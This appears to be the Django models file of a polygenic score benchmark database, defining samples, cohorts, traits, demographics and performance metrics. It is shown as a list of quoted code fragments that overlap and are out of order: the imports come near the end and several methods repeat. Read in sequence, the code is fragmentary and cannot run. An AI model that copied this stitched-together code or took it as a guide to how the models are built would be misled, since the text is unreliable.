"class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span", "class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\"", "estimate # Range if self.range != None and '[' not in estimate: l[self.range_type]", "v != None: l.append(v) # Range r = None if '[' not in", "self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return", "data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property", "display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases", "= models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self):", "None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else:", "{ 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if", "self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type]", "hold performance/accuracy metrics for a PGS and a set of samples\"\"\" # Links", "= models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se)", "def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for", "= '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\"", "self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if", "Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {}", "(PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other", "(cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()]", "show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases =", "a set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score", "return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property", "for a PGS and a set of samples\"\"\" # Links to related objects", "information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex =", "@property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all():", "metrics: l = [] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(),", "hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): #", "'<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} # Estimate estimate =", "(self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def", "data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'):", "= models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id,", "self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return [] #@property #def", "othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic", "return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id)", "bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\":", "Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name", "self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if", "None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return", "'<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property", "to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label =", "type, name, value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance,", "sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else:", "('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample", "+= '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,}", "self.variability, self.unit) if v != None: l.append(v) # Range r = None if", "(type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years')", "categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' #", "max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for", "on the queryset metrics = self.performance_metric.all() if metrics: l = [] for m", "!= None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit)", "#@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else:", "effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list", "else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data", "return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url,", "= \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases = '' if", "False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the", "in categories] # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(),", "on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk))", "= models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait =", "in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number =", "class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in PGS", "all and filter afterward uses less SQL queries than filtering directly on the", ") sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description',", "None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in", "s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return (self.name,", "max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related", "/ self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id", "None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate", "SQL queries than filtering directly on the queryset metrics = self.performance_metric.all() if metrics:", "ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology", "#mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return", "'{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability)", "trait vocabulary (mainly to link multiple EFO to a single score)\"\"\" id =", "Variability v = None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc):", "Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other", "__str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s =", "display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label)", "@property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if", "self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range", "choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free", "Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of", "#def display_category_labels(self): # categories = self.category_list # categories_data = '' # if len(categories)", "= helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r", "= '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if", "BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\" #", "sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self):", "'', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free", "\"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\" # Sample", "Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort =", "default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free =", "#synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings',", "'' def display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate", "= self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0],", "return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = []", "= models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ##", "Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases", "class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]})", "if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms:", "str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return", "null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else:", "return s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return", "verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample:", "in categories] # else: # return [] #@property #def category_labels(self): # category_labels =", "Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or", "data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id)", "'{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e", "None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate", "not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring", "\"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases = '' if show_percent_cases:", "[x.label for x in categories] # else: # return [] #@property #def category_list(self):", "class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short", "if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return [] #@property", "BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary (mainly to", "self.category_list # categories_data = '' # if len(categories) > 0: # category_labels =", "s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s", "the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True)", "models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr),", "!= None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short):", "db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation", "def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): #", "x in categories] # else: # return [] #@property #def category_list(self): # return", "l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] = self.unit return", "len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric", "ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size',", "standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None: return", "def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a", "Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model):", "self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e)", "= models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance", "#@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if", "Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms", "effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for", "self.unit) if v != None: l.append(v) # Range r = None if '['", "'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured =", "self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None:", "to hold performance/accuracy metrics for a PGS and a set of samples\"\"\" #", "\"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True)", "synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else: # return", "variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error", "models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False,", "Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male',", "> 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} #", "Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information", "= models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95%", "Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self):", "to controlled trait vocabulary (mainly to link multiple EFO to a single score)\"\"\"", "for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics", "if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2)", "self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile", "'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type] = set()", "othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]})", "'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0:", "in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data", "!= None: l.append(v) # Range r = None if '[' not in e:", "# for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) >", "== None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self):", "= DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True)", "self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other", "sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True)", "self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None:", "performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES =", "evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT,", "categories] # else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list", "def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}'", "str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if", "= models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic,", "null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None:", "Confidence interval (ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)',", "return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases", "'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases /", "self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self): # if", "if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data", "in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self,", "# Range if self.range != None and '[' not in estimate: l[self.range_type] =", "= '' # if len(categories) > 0: # category_labels = [] # for", "Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate =", "name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract", "@property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) *", "if self.estimate != None: estimate = str(self.estimate) if self.range != None and self.range_type.lower()", "max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class", "if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit != None:", "def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self):", "['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class", "Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self):", "category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) >", "self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring", "perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse", "from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not", "of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'),", "default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open range variability", "category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else", "format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l", "# ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) #", "\"\"\"Class to hold metric type, name, value and confidence intervals of a performance", "db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model):", "<filename>benchmark/models.py from django.db import models from django.conf import settings from django.core.validators import MaxValueValidator,", "sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return", "if len(categories) > 0: # return [x.label for x in categories] # else:", "[] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] =", "'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True", "on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class", "display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip", "default='se') # e.g. standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate", "self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation',", "Unit if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list", "Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases !=", "# Using all and filter afterward uses less SQL queries than filtering directly", "import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the", "of the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval',", "def display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate !=", "null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID", "for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance", "(type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit)", "Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if", "# if self.synonyms: # return self.synonyms.split(' | ') # else: # return []", "no_helptip = '{} : {} {}' # Estimate e = '' if self.estimate", "%s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect", "(len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {}", "Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'),", "models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog", "estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank", "['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if", "'<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' #", "#def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories", "None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1): return", "max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information',", "self.estimate) return None def format_range(self): if self.estimate == None and self.range != None:", "for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list =", "= ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list", "= self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r =", "self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s)", "verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification", "controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring", "error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None", "Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls',", "title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' # Estimate", "if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range !=", "'{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else:", "= models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls =", "def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self):", "categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be", "'<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured", "id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type", "def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span", "# Range r = None if '[' not in e: if self.range !=", "if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate)", "Using all and filter afterward uses less SQL queries than filtering directly on", "self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics =", "description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms =", "sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR',", "+= '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa", "= models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect", "@property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property", "# return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data =", "models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both',", "for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types:", "') # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda", "and filter afterward uses less SQL queries than filtering directly on the 